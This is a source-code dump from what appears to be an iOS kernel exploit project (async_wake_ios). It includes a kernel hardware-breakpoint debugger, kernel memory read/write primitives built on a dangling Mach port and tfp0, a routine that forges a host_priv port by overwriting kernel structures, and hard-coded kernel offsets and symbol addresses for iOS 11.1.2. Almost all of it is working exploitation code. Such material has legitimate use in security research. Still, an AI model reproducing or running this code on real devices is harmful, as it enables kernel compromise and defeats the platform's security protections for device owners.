488 | | | syscall stack frames of | 489 | | | varying depth | 490 | | | (not user state) | 491 | | | | 492 | | +-----------------------------+ <-- kernel hw bp: EL1+SP0 -> EL1+SP1 (sync exception from same exception level running on SP0) 493 | | | | <-- saved state from when the bp was hit 494 | | | struct arm_context_t | 495 | | | .pc = address of hit bp | 496 | | +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ 497 | | | | 498 | | | | 499 | | | stack frames from sync excp | 500 | | | to the infinite loop... | 501 | | | | 502 | | +-----------------------------+ <-- fiq timer: EL1+SP0 -> EL1+SP1 (fiq interrupt from same exception level running on SP0) 503 | | | struct arm_context_t | <-- saved state from the infinite loop before it was scheduled off 504 | | | .pc = addr of the infinite | 505 | | | loop instr | 506 | | |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ 507 | | | | 508 | | | | 509 | | | | 510 | | | | 511 | +- +-----------------------------+ 512 | */ 513 | 514 | typedef void (*breakpoint_callback)(arm_context_t* context); 515 | 516 | volatile int syscall_complete = 0; 517 | 518 | void handle_kernel_bp_hits(mach_port_t target_thread_port, uint64_t looper_pc, uint64_t breakpoint, breakpoint_callback callback) { 519 | // get the target thread's thread_t 520 | uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND); 521 | uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 522 | 523 | while (1) { 524 | uint64_t looper_saved_state = 0; 525 | int found_it = 0; 526 | while (!found_it) { 527 | if (syscall_complete) { 528 | return; 529 | } 530 | // we've pinned ourself to the same core, so if we're running, it isn't... 531 | // in some ways this code is very racy, but when we actually have detected that the target 532 | // thread has hit the breakpoint it should be safe until we restart it 533 | // and up until then we don't do anything too dangerous... 534 | 535 | 536 | // get the kstack pointer 537 | uint64_t kstackptr = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR)); 538 | 539 | printf("kstackptr: %llx\n", kstackptr); 540 | 541 | // get the thread_kernel_state 542 | // the stack lives below kstackptr, and kstackptr itself points to a struct thread_kernel_state: 543 | // the first bit of that is just an arm_context_t: 544 | // this is the scheduled-off state 545 | arm_context_t saved_ksched_state = {0}; 546 | kmemcpy((uint64_t)&saved_ksched_state, kstackptr, sizeof(arm_context_t)); 547 | 548 | // get the saved stack pointer 549 | uint64_t sp = saved_ksched_state.ss.ss_64.sp; 550 | printf("sp: %llx\n", sp); 551 | 552 | if (sp == 0) { 553 | continue; 554 | } 555 | 556 | uint64_t stack[128] = {0}; 557 | 558 | // walk up from there and look for the saved state dumped by the fiq: 559 | // note that it won't be right at the bottom of the stack 560 | // instead there are the frames for: 561 | // ast_taken_kernel <-- above this is the saved state which will get restored when the hw bp spinner gets rescheduled 562 | // thread_block_reason 563 | // thread_invoke 564 | // machine_switch_context 565 | // Switch_context <-- the frame actually at the bottom of the stack 566 | 567 | // should probably walk those stack frame properly, but this will do... 568 | 569 | // grab the stack 570 | kmemcpy((uint64_t)&stack[0], sp, sizeof(stack)); 571 | //for (int i = 0; i < 128; i++) { 572 | // printf("%016llx\n", stack[i]); 573 | //} 574 | 575 | for (int i = 0; i < 128; i++) { 576 | uint64_t flavor_and_count = stack[i]; 577 | if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { 578 | continue; 579 | } 580 | 581 | arm_context_t* saved_state = (arm_context_t*)&stack[i]; 582 | 583 | if (saved_state->ss.ss_64.pc != looper_pc) { 584 | continue; 585 | } 586 | 587 | found_it = 1; 588 | looper_saved_state = sp + (i*sizeof(uint64_t)); 589 | printf("found the saved state probably at %llx\n", looper_saved_state); // should walk the stack properly.. 590 | break; 591 | } 592 | 593 | if (!found_it) { 594 | printf("unable to find the saved scheduler tick state on the stack, waiting a bit then trying again...\n"); 595 | sleep(1); 596 | return; 597 | } 598 | 599 | } 600 | 601 | 602 | 603 | // now keep walking up and find the saved state for the code which hit the BP: 604 | uint64_t bp_hitting_state = looper_saved_state + sizeof(arm_context_t); 605 | found_it = 0; 606 | for (int i = 0; i < 1000; i++) { 607 | uint64_t flavor_and_count = rk64(bp_hitting_state); 608 | if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { 609 | bp_hitting_state += 8; 610 | continue; 611 | } 612 | 613 | arm_context_t bp_context; 614 | kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); 615 | 616 | for (int i = 0; i < 40; i++) { 617 | uint64_t* buf = (uint64_t*)&bp_context; 618 | printf("%016llx\n", buf[i]); 619 | } 620 | 621 | if (bp_context.ss.ss_64.pc != breakpoint) { 622 | printf("hummm, found an unexpected breakpoint: %llx\n", bp_context.ss.ss_64.pc); 623 | } 624 | 625 | found_it = 1; 626 | break; 627 | } 628 | 629 | if (!found_it) { 630 | printf("unable to find bp hitting state\n"); 631 | } 632 | 633 | // fix up the bp hitting state so it will continue (with whatever modifications we want:) 634 | // get a copy of the state: 635 | arm_context_t bp_context; 636 | kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); 637 | 638 | callback(&bp_context); 639 | 640 | // write that new state back: 641 | kmemcpy(bp_hitting_state, (uint64_t)&bp_context, sizeof(arm_context_t)); 642 | 643 | // unblock the looper: 644 | wk64(looper_saved_state + offsetof(arm_context_t, ss.ss_64.pc), ksym(KSYMBOL_SLEH_SYNC_EPILOG)); 645 | 646 | // when it runs again it should break out of the loop and continue the syscall 647 | // forces us off the core and hopefully it on: 648 | thread_switch(target_thread_port, 0, 0); 649 | swtch_pri(0); 650 | 651 | } 652 | } 653 | 654 | struct monitor_args { 655 | mach_port_t target_thread_port; 656 | uint64_t breakpoint; 657 | breakpoint_callback callback; 658 | }; 659 | 660 | 661 | void* monitor_thread(void* arg) { 662 | struct monitor_args* args = (struct monitor_args*)arg; 663 | 664 | printf("monitor thread running, pinning to core\n"); 665 | pin_current_thread(); 666 | printf("monitor thread pinned\n"); 667 | handle_kernel_bp_hits(args->target_thread_port, ksym(KSYMBOL_EL1_HW_BP_INFINITE_LOOP), args->breakpoint, args->callback); 668 | return NULL; 669 | } 670 | 671 | // this runs on the thread which will execute the target syscall to debug 672 | void run_syscall_with_breakpoint(uint64_t bp_address, breakpoint_callback callback, uint32_t syscall_number, uint32_t n_args, ...) { 673 | // pin this thread to the target cpu: 674 | pin_current_thread(); 675 | 676 | // set the Kernel Debug Enable bit of MDSCR_EL1: 677 | set_MDSCR_EL1_KDE(mach_thread_self()); 678 | 679 | // MDE will be set by the regular API for us 680 | 681 | // enable a hw debug breakpoint at bp_address 682 | // it won't fire because PSTATE.D will be set, but we'll deal with that in a bit! 683 | 684 | // set a hardware bp on the thread using the proper API so that all the structures are already set up: 685 | struct arm64_debug_state state = {0}; 686 | state.bvr[0] = bp_address; 687 | #define BCR_BAS_ALL (0xf << 5) 688 | #define BCR_E (1 << 0) 689 | state.bcr[0] = BCR_BAS_ALL | BCR_E; // enabled 690 | kern_return_t err = thread_set_state(mach_thread_self(), 691 | ARM_DEBUG_STATE64, 692 | (thread_state_t)&state, 693 | sizeof(state)/4); 694 | 695 | // verify that it got set: 696 | memset(&state, 0, sizeof(state)); 697 | mach_msg_type_number_t count = sizeof(state)/4; 698 | err = thread_get_state(mach_thread_self(), 699 | ARM_DEBUG_STATE64, 700 | (thread_state_t)&state, 701 | &count); 702 | 703 | if (state.bvr[0] != bp_address) { 704 | printf("setting the bp address failed\n"); 705 | } 706 | 707 | 708 | // now go and find that thread's DebugData where those values are stored. 709 | 710 | uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); 711 | uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 712 | 713 | printf("thread_t_addr: %llx\n", thread_t_addr); 714 | 715 | // read bvr[0] in that thread_t's DebugData: 716 | uint64_t DebugData = rk64(thread_t_addr + ACT_DEBUGDATA_OFFSET); 717 | //printf("DebugData: %llx\n", DebugData); 718 | 719 | uint64_t bvr0 = rk64(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bvr[0])); 720 | printf("bvr0 read from the DebugData: 0x%llx\n", bvr0); 721 | 722 | uint32_t bcr0 = rk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0])); 723 | printf("bcr0 read from the DebugData: 0x%08x\n", bcr0); 724 | 725 | // need to manually set this too in the bcr: 726 | #define ARM_DBG_CR_MODE_CONTROL_ANY (3 << 1) 727 | bcr0 |= ARM_DBG_CR_MODE_CONTROL_ANY; 728 | 729 | wk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0]), bcr0); 730 | 731 | printf("set ARM_DBG_CR_MODE_CONTROL_ANY\n"); 732 | // returning from the syscall should be enough to set it. 733 | 734 | struct monitor_args* margs = malloc(sizeof(struct monitor_args)); 735 | margs->target_thread_port = mach_thread_self(); 736 | margs->breakpoint = bp_address; 737 | margs->callback = callback; 738 | 739 | // spin up a thread to monitor when the bp is hit: 740 | pthread_t th; 741 | pthread_create(&th, NULL, monitor_thread, (void*)margs); 742 | printf("started monitor thread\n"); 743 | 744 | struct syscall_args sargs = {0}; 745 | sargs.number = syscall_number; 746 | va_list ap; 747 | va_start(ap, n_args); 748 | 749 | for (int i = 0; i < n_args; i++){ 750 | sargs.arg[i] = va_arg(ap, uint64_t); 751 | } 752 | 753 | va_end(ap); 754 | 755 | // now execute a syscall with PSTATE.D disabled: 756 | syscall_complete = 0; 757 | do_syscall_with_pstate_d_unmasked(&sargs); 758 | syscall_complete = 1; 759 | printf("syscall returned\n"); 760 | 761 | pthread_join(th, NULL); 762 | printf("monitor exited\n"); 763 | 764 | } 765 | 766 | void sys_write_breakpoint_handler(arm_context_t* state) { 767 | // we will have to skip it one instruction ahead because single step won't work... 768 | state->ss.ss_64.pc += 4; 769 | 770 | // this means emulating what that instruction did: 771 | // LDR X8, [X8,#0x388] 772 | uint64_t val = rk64(state->ss.ss_64.x[8] + 0x388); 773 | state->ss.ss_64.x[8] = val; 774 | 775 | uint64_t uap = state->ss.ss_64.x[1]; 776 | char* replacer_string = strdup("a different string!\n"); 777 | wk64(uap+8, (uint64_t)replacer_string); 778 | wk64(uap+0x10, strlen(replacer_string)); 779 | } 780 | 781 | char* hello_wrld_str = "hellowrld!\n"; 782 | void test_kdbg() { 783 | run_syscall_with_breakpoint(ksym(KSYMBOL_WRITE_SYSCALL_ENTRYPOINT), // breakpoint address 784 | sys_write_breakpoint_handler, // breakpoint hit handler 785 | 4, // SYS_write 786 | 3, // 3 arguments 787 | 1, // stdout 788 | (uint64_t)hello_wrld_str, // "hellowrld!\n" 789 | strlen(hello_wrld_str)); // 11 790 | } 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | -------------------------------------------------------------------------------- /async_wake_ios/kdbg.h: -------------------------------------------------------------------------------- 1 | #ifndef kdbg_h 2 | #define kdbg_h 3 | 4 | void test_kernel_bp(void); 5 | uint64_t pin_current_thread(void); 6 | void test_kdbg(void); 7 | void test_fp(void); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /async_wake_ios/kmem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | #include "kmem.h" 8 | #include "kutils.h" 9 | 10 | /***** mach_vm.h *****/ 11 | kern_return_t mach_vm_read( 12 | vm_map_t target_task, 13 | mach_vm_address_t address, 14 | mach_vm_size_t size, 15 | vm_offset_t *data, 16 | mach_msg_type_number_t *dataCnt); 17 | 18 | kern_return_t mach_vm_write( 19 | vm_map_t target_task, 20 | mach_vm_address_t address, 21 | vm_offset_t data, 22 | mach_msg_type_number_t dataCnt); 23 | 24 | kern_return_t mach_vm_read_overwrite( 25 | vm_map_t target_task, 26 | mach_vm_address_t address, 27 | mach_vm_size_t size, 28 | mach_vm_address_t data, 29 | mach_vm_size_t *outsize); 30 | 31 | kern_return_t mach_vm_allocate( 32 | vm_map_t target, 33 | mach_vm_address_t *address, 34 | mach_vm_size_t size, 35 | int flags); 36 | 37 | kern_return_t mach_vm_deallocate ( 38 | vm_map_t target, 39 | mach_vm_address_t address, 40 | mach_vm_size_t size); 41 | 42 | kern_return_t mach_vm_protect ( 43 | vm_map_t target_task, 44 | mach_vm_address_t address, 45 | mach_vm_size_t size, 46 | boolean_t set_maximum, 47 | vm_prot_t new_protection); 48 | 49 | // the exploit bootstraps the full kernel memory read/write with a fake 50 | // task which just allows reading via the bsd_info->pid trick 51 | // this first port is kmem_read_port 52 | mach_port_t kmem_read_port = MACH_PORT_NULL; 53 | void prepare_rk_via_kmem_read_port(mach_port_t port) { 54 | kmem_read_port = port; 55 | } 56 | 57 | mach_port_t tfp0 = MACH_PORT_NULL; 58 | void prepare_rwk_via_tfp0(mach_port_t port) { 59 | tfp0 = port; 60 | } 61 | 62 | int have_kmem_read() { 63 | return (kmem_read_port != MACH_PORT_NULL) || (tfp0 != MACH_PORT_NULL); 64 | } 65 | 66 | int have_kmem_write() { 67 | return (tfp0 != MACH_PORT_NULL); 68 | } 69 | 70 | uint32_t rk32_via_kmem_read_port(uint64_t kaddr) { 71 | kern_return_t err; 72 | if (kmem_read_port == MACH_PORT_NULL) { 73 | printf("kmem_read_port not set, have you called prepare_rk?\n"); 74 | sleep(10); 75 | exit(EXIT_FAILURE); 76 | } 77 | 78 | mach_port_context_t context = (mach_port_context_t)kaddr - 0x10; 79 | err = mach_port_set_context(mach_task_self(), kmem_read_port, context); 80 | if (err != KERN_SUCCESS) { 81 | printf("error setting context off of dangling port: %x %s\n", err, mach_error_string(err)); 82 | sleep(10); 83 | exit(EXIT_FAILURE); 84 | } 85 | 86 | // now do the read: 87 | uint32_t val = 0; 88 | err = pid_for_task(kmem_read_port, (int*)&val); 89 | if (err != KERN_SUCCESS) { 90 | printf("error calling pid_for_task %x %s", err, mach_error_string(err)); 91 | sleep(10); 92 | exit(EXIT_FAILURE); 93 | } 94 | 95 | return val; 96 | } 97 | 98 | uint32_t rk32_via_tfp0(uint64_t kaddr) { 99 | kern_return_t err; 100 | uint32_t val = 0; 101 | mach_vm_size_t outsize = 0; 102 | err = mach_vm_read_overwrite(tfp0, 103 | (mach_vm_address_t)kaddr, 104 | (mach_vm_size_t)sizeof(uint32_t), 105 | (mach_vm_address_t)&val, 106 | &outsize); 107 | if (err != KERN_SUCCESS){ 108 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 109 | sleep(3); 110 | return 0; 111 | } 112 | 113 | if (outsize != sizeof(uint32_t)){ 114 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 115 | sleep(3); 116 | return 0; 117 | } 118 | return val; 119 | } 120 | 121 | uint32_t rk32(uint64_t kaddr) { 122 | if (tfp0 != MACH_PORT_NULL) { 123 | return rk32_via_tfp0(kaddr); 124 | } 125 | 126 | if (kmem_read_port != MACH_PORT_NULL) { 127 | return rk32_via_kmem_read_port(kaddr); 128 | } 129 | 130 | printf("attempt to read kernel memory but no kernel memory read primitives available\n"); 131 | sleep(3); 132 | 133 | return 0; 134 | } 135 | 136 | uint64_t rk64(uint64_t kaddr) { 137 | uint64_t lower = rk32(kaddr); 138 | uint64_t higher = rk32(kaddr+4); 139 | uint64_t full = ((higher<<32) | lower); 140 | return full; 141 | } 142 | 143 | void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length) { 144 | if (tfp0 == MACH_PORT_NULL) { 145 | printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 146 | sleep(3); 147 | return; 148 | } 149 | 150 | kern_return_t err; 151 | err = mach_vm_write(tfp0, 152 | (mach_vm_address_t)kaddr, 153 | (vm_offset_t)buffer, 154 | (mach_msg_type_number_t)length); 155 | 156 | if (err != KERN_SUCCESS) { 157 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 158 | return; 159 | } 160 | } 161 | 162 | void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length) { 163 | kern_return_t err; 164 | uint32_t val = 0; 165 | mach_vm_size_t outsize = 0; 166 | err = mach_vm_read_overwrite(tfp0, 167 | (mach_vm_address_t)kaddr, 168 | (mach_vm_size_t)length, 169 | (mach_vm_address_t)buffer, 170 | &outsize); 171 | if (err != KERN_SUCCESS){ 172 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 173 | sleep(3); 174 | return; 175 | } 176 | 177 | if (outsize != length){ 178 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 179 | sleep(3); 180 | return; 181 | } 182 | } 183 | 184 | const uint64_t kernel_address_space_base = 0xffff000000000000; 185 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length) { 186 | if (dest >= kernel_address_space_base) { 187 | // copy to kernel: 188 | wkbuffer(dest, (void*) src, length); 189 | } else { 190 | // copy from kernel 191 | rkbuffer(src, (void*)dest, length); 192 | } 193 | } 194 | 195 | void wk32(uint64_t kaddr, uint32_t val) { 196 | if (tfp0 == MACH_PORT_NULL) { 197 | printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 198 | sleep(3); 199 | return; 200 | } 201 | 202 | kern_return_t err; 203 | err = mach_vm_write(tfp0, 204 | (mach_vm_address_t)kaddr, 205 | (vm_offset_t)&val, 206 | (mach_msg_type_number_t)sizeof(uint32_t)); 207 | 208 | if (err != KERN_SUCCESS) { 209 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 210 | return; 211 | } 212 | } 213 | 214 | void wk64(uint64_t kaddr, uint64_t val) { 215 | uint32_t lower = (uint32_t)(val & 0xffffffff); 216 | uint32_t higher = (uint32_t)(val >> 32); 217 | wk32(kaddr, lower); 218 | wk32(kaddr+4, higher); 219 | } 220 | 221 | uint64_t kmem_alloc(uint64_t size) { 222 | if (tfp0 == MACH_PORT_NULL) { 223 | printf("attempt to allocate kernel memory before any kernel memory write primitives available\n"); 224 | sleep(3); 225 | return 0; 226 | } 227 | 228 | kern_return_t err; 229 | mach_vm_address_t addr = 0; 230 | mach_vm_size_t ksize = round_page_kernel(size); 231 | err = mach_vm_allocate(tfp0, &addr, ksize, VM_FLAGS_ANYWHERE); 232 | if (err != KERN_SUCCESS) { 233 | printf("unable to allocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 234 | sleep(3); 235 | return 0; 236 | } 237 | return addr; 238 | } 239 | 240 | uint64_t kmem_alloc_wired(uint64_t size) { 241 | if (tfp0 == MACH_PORT_NULL) { 242 | printf("attempt to allocate kernel memory before any kernel memory write primitives available\n"); 243 | sleep(3); 244 | return 0; 245 | } 246 | 247 | kern_return_t err; 248 | mach_vm_address_t addr = 0; 249 | mach_vm_size_t ksize = round_page_kernel(size); 250 | 251 | printf("vm_kernel_page_size: %lx\n", vm_kernel_page_size); 252 | 253 | err = mach_vm_allocate(tfp0, &addr, ksize+0x4000, VM_FLAGS_ANYWHERE); 254 | if (err != KERN_SUCCESS) { 255 | printf("unable to allocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 256 | sleep(3); 257 | return 0; 258 | } 259 | 260 | printf("allocated address: %llx\n", addr); 261 | 262 | addr += 0x3fff; 263 | addr &= ~0x3fffull; 264 | 265 | printf("address to wire: %llx\n", addr); 266 | 267 | err = mach_vm_wire(fake_host_priv(), tfp0, addr, ksize, VM_PROT_READ|VM_PROT_WRITE); 268 | if (err != KERN_SUCCESS) { 269 | printf("unable to wire kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 270 | sleep(3); 271 | return 0; 272 | } 273 | return addr; 274 | } 275 | 276 | void kmem_free(uint64_t kaddr, uint64_t size) { 277 | return; 278 | if (tfp0 == MACH_PORT_NULL) { 279 | printf("attempt to deallocate kernel memory before any kernel memory write primitives available\n"); 280 | sleep(3); 281 | return; 282 | } 283 | 284 | kern_return_t err; 285 | mach_vm_size_t ksize = round_page_kernel(size); 286 | err = mach_vm_deallocate(tfp0, kaddr, ksize); 287 | if (err != KERN_SUCCESS) { 288 | printf("unable to deallocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 289 | sleep(3); 290 | return; 291 | } 292 | } 293 | 294 | void kmem_protect(uint64_t kaddr, uint32_t size, int prot) { 295 | if (tfp0 == MACH_PORT_NULL) { 296 | printf("attempt to change protection of kernel memory before any kernel memory write primitives available\n"); 297 | sleep(3); 298 | return; 299 | } 300 | kern_return_t err; 301 | err = mach_vm_protect(tfp0, (mach_vm_address_t)kaddr, (mach_vm_size_t)size, 0, (vm_prot_t)prot); 302 | if (err != KERN_SUCCESS) { 303 | printf("unable to change protection of kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 304 | sleep(3); 305 | return; 306 | } 307 | } 308 | -------------------------------------------------------------------------------- /async_wake_ios/kmem.h: -------------------------------------------------------------------------------- 1 | #ifndef kmem_h 2 | #define kmem_h 3 | 4 | #include 5 | 6 | uint32_t rk32(uint64_t kaddr); 7 | uint64_t rk64(uint64_t kaddr); 8 | 9 | void wk32(uint64_t kaddr, uint32_t val); 10 | void wk64(uint64_t kaddr, uint64_t val); 11 | 12 | void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length); 13 | void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length); 14 | 15 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length); 16 | 17 | void kmem_protect(uint64_t kaddr, uint32_t size, int prot); 18 | 19 | uint64_t kmem_alloc(uint64_t size); 20 | uint64_t kmem_alloc_wired(uint64_t size); 21 | void kmem_free(uint64_t kaddr, uint64_t size); 22 | 23 | void prepare_rk_via_kmem_read_port(mach_port_t port); 24 | void prepare_rwk_via_tfp0(mach_port_t port); 25 | 26 | // query whether kmem read or write is present 27 | int have_kmem_read(void); 28 | int have_kmem_write(void); 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /async_wake_ios/kutils.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | 6 | #include "kutils.h" 7 | #include "kmem.h" 8 | #include "find_port.h" 9 | #include "symbols.h" 10 | 11 | uint64_t cached_task_self_addr = 0; 12 | uint64_t task_self_addr() { 13 | if (cached_task_self_addr == 0) { 14 | cached_task_self_addr = find_port_address(mach_task_self(), MACH_MSG_TYPE_COPY_SEND); 15 | printf("task self: 0x%llx\n", cached_task_self_addr); 16 | } 17 | return cached_task_self_addr; 18 | } 19 | 20 | uint64_t ipc_space_kernel() { 21 | return rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 22 | } 23 | 24 | uint64_t current_thread() { 25 | uint64_t thread_port = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); 26 | return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 27 | } 28 | 29 | uint64_t find_kernel_base() { 30 | uint64_t hostport_addr = find_port_address(mach_host_self(), MACH_MSG_TYPE_COPY_SEND); 31 | uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 32 | 33 | uint64_t base = realhost & ~0xfffULL; 34 | // walk down to find the magic: 35 | for (int i = 0; i < 0x10000; i++) { 36 | if (rk32(base) == 0xfeedfacf) { 37 | return base; 38 | } 39 | base -= 0x1000; 40 | } 41 | return 0; 42 | } 43 | mach_port_t fake_host_priv_port = MACH_PORT_NULL; 44 | 45 | // build a fake host priv port 46 | mach_port_t fake_host_priv() { 47 | if (fake_host_priv_port != MACH_PORT_NULL) { 48 | return fake_host_priv_port; 49 | } 50 | // get the address of realhost: 51 | uint64_t hostport_addr = find_port_address(mach_host_self(), MACH_MSG_TYPE_COPY_SEND); 52 | uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 53 | 54 | // allocate a port 55 | mach_port_t port = MACH_PORT_NULL; 56 | kern_return_t err; 57 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 58 | if (err != KERN_SUCCESS) { 59 | printf("failed to allocate port\n"); 60 | return MACH_PORT_NULL; 61 | } 62 | 63 | // get a send right 64 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 65 | 66 | // locate the port 67 | uint64_t port_addr = find_port_address(port, MACH_MSG_TYPE_COPY_SEND); 68 | 69 | // change the type of the port 70 | #define IKOT_HOST_PRIV 4 71 | #define IO_ACTIVE 0x80000000 72 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV); 73 | 74 | // change the space of the port 75 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); 76 | 77 | // set the kobject 78 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost); 79 | 80 | fake_host_priv_port = port; 81 | 82 | return port; 83 | } 84 | -------------------------------------------------------------------------------- /async_wake_ios/kutils.h: -------------------------------------------------------------------------------- 1 | #ifndef kutils_h 2 | #define kutils_h 3 | 4 | #include 5 | 6 | uint64_t task_self_addr(void); 7 | uint64_t ipc_space_kernel(void); 8 | uint64_t find_kernel_base(void); 9 | 10 | uint64_t current_thread(void); 11 | 12 | mach_port_t fake_host_priv(void); 13 | 14 | #endif /* kutils_h */ 15 | -------------------------------------------------------------------------------- /async_wake_ios/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "AppDelegate.h" 3 | 4 | int main(int argc, char * argv[]) { 5 | @autoreleasepool { 6 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /async_wake_ios/symbols.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "symbols.h" 7 | #include "kmem.h" 8 | #include "kutils.h" 9 | 10 | // the offsets are unlikely to change between similar models and builds, but the symbol addresses will 11 | // the offsets are required to get the kernel r/w but the symbols aren't 12 | 13 | int* offsets = NULL; 14 | 15 | 16 | /* iOS 11.1.2 */ 17 | int kstruct_offsets_15B202[] = { 18 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 19 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 20 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 21 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 22 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 23 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 24 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 25 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 26 | 27 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 28 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 29 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 30 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 31 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 32 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 33 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 34 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 35 | 36 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 37 | 38 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 39 | 40 | 0x180, // KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR 41 | 0x188, // KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR 42 | 0x190, // KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR 43 | 0x408, // KSTRUCT_OFFSET_THREAD_CONTEXT_DATA 44 | 0x410, // KSTRUCT_OFFSET_THREAD_UPCB 45 | 0x418, // KSTRUCT_OFFSET_THREAD_UNEON 46 | 0x420, // KSTRUCT_OFFSET_THREAD_KSTACKPTR 47 | 48 | 0x54, // KSTRUCT_OFFSET_PROCESSOR_CPU_ID 49 | 50 | 0x28, // KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR 51 | 0X78, // KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR 52 | }; 53 | 54 | int koffset(enum kstruct_offset offset) { 55 | if (offsets == NULL) { 56 | printf("need to call symbols_init() prior to querying offsets\n"); 57 | return 0; 58 | } 59 | return offsets[offset]; 60 | } 61 | 62 | // this is the base of the kernel, not the kernelcache 63 | uint64_t kernel_base = 0; 64 | uint64_t* symbols = NULL; 65 | uint64_t kaslr_slide = 0; 66 | 67 | // ip7 68 | uint64_t ksymbols_iphone_7_15B202[] = { 69 | 0xfffffff0074d74cc, // KSYMBOL_OSARRAY_GET_META_CLASS, 70 | 0xfffffff007566454, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 71 | 0xfffffff007567bfc, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 72 | 0xfffffff0073eb130, // KSYMBOL_CSBLOB_GET_CD_HASH 73 | 0xfffffff007101248, // KSYMBOL_KALLOC_EXTERNAL 74 | 0xfffffff007101278, // KSYMBOL_KFREE 75 | 0xfffffff0074d74d4, // KYSMBOL_RET 76 | 0xfffffff0074f11cc, // KSYMBOL_OSSERIALIZER_SERIALIZE, 77 | 0xfffffff00758c618, // KSYMBOL_KPRINTF 78 | 